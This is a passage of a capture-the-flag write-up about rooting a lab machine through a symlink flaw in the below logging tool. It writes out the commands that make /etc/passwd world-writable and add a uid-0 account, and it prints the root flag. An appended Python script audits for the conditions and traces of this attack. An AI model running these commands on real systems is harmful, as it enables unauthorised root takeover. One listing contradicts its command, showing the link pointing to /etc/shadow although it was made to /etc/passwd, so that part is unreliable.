jacob@outbound:~$ ln -sf /etc/passwd /var/log/below/error_root.log
jacob@outbound:~$ ls -lah /var/log/below/error_root.log
lrwxrwxrwx 1 jacob jacob 11 Jul 13 04:33 /var/log/below/error_root.log -> /etc/shadow
jacob@outbound:~$ ls -lah /etc/passwd
-rw-r--r-- 1 root root 1.2K Jul 13 04:33 /etc/passwd
jacob@outbound:~$

After running below once more, the permissions of /etc/passwd have changed.

jacob@outbound:~$ sudo below record
Jul 13 04:34:22.066 DEBG Starting up!
Jul 13 04:34:22.067 ERRO 
----------------- Detected unclean exit ---------------------
Error Message: Failed to acquire file lock on index file: /var/log/below/store/index_01752364800: EAGAIN: Try again
-------------------------------------------------------------
jacob@outbound:~$ ls -lah /etc/passwd
-rw-rw-rw- 1 root root 1.8K Jul 13 04:34 /etc/passwd
jacob@outbound:~$

Shell

With write permission on /etc/passwd, we add a new root user. Switching to this user gives us root and the root.txt flag.

jacob@outbound:~$ echo "sckull:$(openssl passwd -1 sckull):0:0:root:/root:/bin/bash" >> /etc/passwd
jacob@outbound:~$ su sckull
Password: 
root@outbound:/home/jacob# cd
root@outbound:~# ls
root.txt
root@outbound:~# cat root.txt 
bd33658a197d98897d10093eff0cca68
root@outbound:~#

Commands

# delete log file
rm /var/log/below/error_root.log
# create symlink
ln -sf /etc/passwd /var/log/below/error_root.log
# run below command
sudo below record
# add new user to /etc/passwd
echo "sckull:$(openssl passwd -1 sckull):0:0:root:/root:/bin/bash" >> /etc/passwd
# change to that user
su sckull
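As an added check (not part of the original writeup), this Python script audits the conditions the escalation above relies on and the trace it leaves behind: a world-writable /var/log/below, symlinks inside it, /etc/passwd or /etc/shadow left group- or world-writable, and extra uid-0 accounts in /etc/passwd. demo_logdir() builds a constructed replica of the directory listing above in a temporary directory so the script can run away from the box; the sample passwd text uses a placeholder hash.

```python
"""Host checks for the below symlink escalation path (CVE-2025-27591) shown above."""
import os
import stat
import tempfile


def audit_below_logdir(logdir: str = '/var/log/below') -> list:
    """Findings about the log directory below writes to as root."""
    findings = []
    try:
        st = os.lstat(logdir)
    except FileNotFoundError:
        return findings                       # below not installed or never run
    if st.st_mode & stat.S_IWOTH:
        findings.append(f'{logdir} is world-writable (mode {stat.S_IMODE(st.st_mode):04o}): '
                        'any user can replace error_root.log with a symlink')
    for name in sorted(os.listdir(logdir)):
        path = os.path.join(logdir, name)
        est = os.lstat(path)
        if stat.S_ISLNK(est.st_mode):
            findings.append(f'{path} is a symlink -> {os.readlink(path)}')
        elif stat.S_ISREG(est.st_mode) and est.st_uid == 0 and est.st_mode & stat.S_IWOTH:
            findings.append(f'{path} is root-owned and world-writable '
                            f'(mode {stat.S_IMODE(est.st_mode):04o})')
    return findings


def audit_system_files(paths=('/etc/passwd', '/etc/shadow')) -> list:
    """Flag account databases that ended up group- or world-writable (0666 above)."""
    findings = []
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f'{path} is writable by group or others '
                            f'(mode {stat.S_IMODE(st.st_mode):04o})')
    return findings


def uid0_accounts(passwd_text: str) -> list:
    """Names of every account with uid 0 in passwd(5) text; only root is expected."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(':')
        if len(fields) >= 7 and fields[2] == '0':
            names.append(fields[0])
    return names


def demo_logdir() -> str:
    """Constructed replica of the /var/log/below listing above, in a temp dir."""
    d = tempfile.mkdtemp(prefix='below-demo-')
    os.chmod(d, 0o777)                        # drwxrwxrwx, as on the box
    for name in ('error_jacob.log', 'target.txt'):
        with open(os.path.join(d, name), 'w'):
            pass
    # error_root.log replaced by a symlink; here it points inside the demo dir
    os.symlink(os.path.join(d, 'target.txt'), os.path.join(d, 'error_root.log'))
    return d


# Constructed sample: the four shell accounts from /etc/passwd above plus the line the
# exploit appends, with a placeholder hash instead of a real one.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
tyler:x:1000:1000::/home/tyler:/bin/bash
jacob:x:1001:1001::/home/jacob:/bin/bash
mel:x:1002:1002::/home/mel:/bin/bash
sckull:$1$PLACEHOLDER$xxxxxxxxxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash
"""

if __name__ == '__main__':
    for finding in audit_below_logdir(demo_logdir()) + audit_system_files():
        print(finding)
    print('uid 0 accounts in sample:', uid0_accounts(SAMPLE_PASSWD))
```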

Dump Hashes

Finally we read the /etc/shadow file.

root@outbound:~# cat /etc/shadow
root@outbound:~#
Written by sckull (Dany Sucuc)